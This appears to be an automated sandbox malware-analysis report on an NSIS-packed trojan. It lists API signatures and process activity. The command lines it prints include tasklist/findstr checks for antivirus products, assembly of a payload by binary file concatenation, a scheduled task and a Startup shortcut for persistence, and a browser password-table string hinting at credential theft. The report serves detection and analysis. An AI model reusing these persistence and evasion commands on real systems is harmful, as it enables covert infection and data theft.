Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00489FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 26_2_00489FD2

System Summary
barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Wscript called in batch mode (surpress errors)
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js"
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle, 18_2_004E4763
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004D1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 18_2_004D1B4D
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040348F
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 18_2_004DF20D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0045F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 26_2_0045F20D
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_00406AFA 0_2_00406AFA
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00498017 18_2_00498017
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_0048E144 18_2_0048E144
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_0047E1F0 18_2_0047E1F0
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004AA26E 18_2_004AA26E
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004722AD 18_2_004722AD
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004922A2 18_2_004922A2
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_0048C624 18_2_0048C624
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004AE87F 18_2_004AE87F
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004FC8A4 18_2_004FC8A4
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E2A05 18_2_004E2A05
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004A6ADE 18_2_004A6ADE
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004D8BFF 18_2_004D8BFF
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_0048CD7A 18_2_0048CD7A
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_0049CE10 18_2_0049CE10
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004A7159 18_2_004A7159
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00479240 18_2_00479240
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00505311 18_2_00505311
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004796E0 18_2_004796E0
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00491704 18_2_00491704
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00491A76 18_2_00491A76
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00479B60 18_2_00479B60
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00497B8B 18_2_00497B8B
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00491D20 18_2_00491D20
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00497DBA 18_2_00497DBA
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00491FE7 18_2_00491FE7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00418017 26_2_00418017
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_003FE1F0 26_2_003FE1F0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0042A26E 26_2_0042A26E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_003F226D 26_2_003F226D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_004122A2 26_2_004122A2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0040C4B7 26_2_0040C4B7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0042E87F 26_2_0042E87F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0047C8A4 26_2_0047C8A4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00462A05 26_2_00462A05
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00426ADE 26_2_00426ADE
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00458BFF 26_2_00458BFF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0041CE10 26_2_0041CE10
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00427159 26_2_00427159
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_003F9240 26_2_003F9240
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00485311 26_2_00485311
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_003FD380 26_2_003FD380
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_003F96E0 26_2_003F96E0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00411704 26_2_00411704
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00411A76 26_2_00411A76
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_003F9B60 26_2_003F9B60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00417B8B 26_2_00417B8B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00411D20 26_2_00411D20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00417DBA 26_2_00417DBA
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00411FE7 26_2_00411FE7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_016209E0 26_2_016209E0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01604B00 26_2_01604B00
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0163EC50 26_2_0163EC50
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01626F56 26_2_01626F56
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_016213B0 26_2_016213B0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0163F660 26_2_0163F660
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_016040FF 26_2_016040FF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01620342 26_2_01620342
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01606320 26_2_01606320
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_016068E0 26_2_016068E0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_016288F9 26_2_016288F9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01622A63 26_2_01622A63
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01620A60 26_2_01620A60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0163EF60 26_2_0163EF60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01616E26 26_2_01616E26
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01637110 26_2_01637110
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01607192 26_2_01607192
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01601000 26_2_01601000
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01623269 26_2_01623269
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0163F2C0 26_2_0163F2C0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01601730 26_2_01601730
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0161D7C0 26_2_0161D7C0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01603699 26_2_01603699
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0160585F 26_2_0160585F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01605B08 26_2_01605B08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01621B82 26_2_01621B82
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01625A60 26_2_01625A60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0160FA90 26_2_0160FA90
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01603A90 26_2_01603A90
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01607D50 26_2_01607D50
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01623C66 26_2_01623C66
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01623C20 26_2_01623C20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01605E23 26_2_01605E23
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: String function: 0048FD52 appears 40 times
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: String function: 00490DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: String function: 0040FD52 appears 41 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: String function: 01608800 appears 67 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: String function: 00410DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: String function: 00414CD3 appears 33 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: String function: 0160FC30 appears 188 times
PE / OLE file has an invalid certificate
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1602918760.000000000291C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeP vs SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@40/36@2/2
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E41FA GetLastError,FormatMessageW, 18_2_004E41FA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040348F
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004D2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 18_2_004D2010
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004D1A0B AdjustTokenPrivileges,CloseHandle, 18_2_004D1A0B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00452010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 26_2_00452010
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00451A0B AdjustTokenPrivileges,CloseHandle, 26_2_00451A0B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_00404822 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404822
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification, 18_2_004DDD87
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_004021A2 CoCreateInstance, 0_2_004021A2
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 18_2_004E3A0E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Double Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe File created: C:\Users\user\AppData\Local\Temp\nsfCD33.tmp Jump to behavior
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Buffer.pif, 0000001A.00000003.2039023269.00000000017F3000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2038899408.0000000003B45000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe ReversingLabs: Detection: 15%
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Virustotal: Detection: 12%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Emotions Emotions.cmd & Emotions.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1181
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MasBathroomsCompoundInjection" Participants
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Terminal + Involve + Experiencing + Borders + Deborah + Flip 1181\Y
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif 1181\Buffer.pif 1181\Y
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Indeed" /tr "wscript //B 'C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Indeed" /tr "wscript //B 'C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduSpark.url" & echo URL="C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduSpark.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif "C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif" "C:\Users\user\AppData\Local\EdTech Spark Solutions\w"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif "C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif" "C:\Users\user\AppData\Local\EdTech Spark Solutions\w"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Emotions Emotions.cmd & Emotions.cmd & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1181 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MasBathroomsCompoundInjection" Participants Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Terminal + Involve + Experiencing + Borders + Deborah + Flip 1181\Y Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif 1181\Buffer.pif 1181\Y Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1 Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Indeed" /tr "wscript //B 'C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js'" /sc minute /mo 5 /F Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduSpark.url" & echo URL="C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduSpark.url" & exit Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Indeed" /tr "wscript //B 'C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js'" /sc minute /mo 5 /F Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif "C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif" "C:\Users\user\AppData\Local\EdTech Spark Solutions\w" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif "C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif" "C:\Users\user\AppData\Local\EdTech Spark Solutions\w" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: uxtheme.dll Jump to behavior
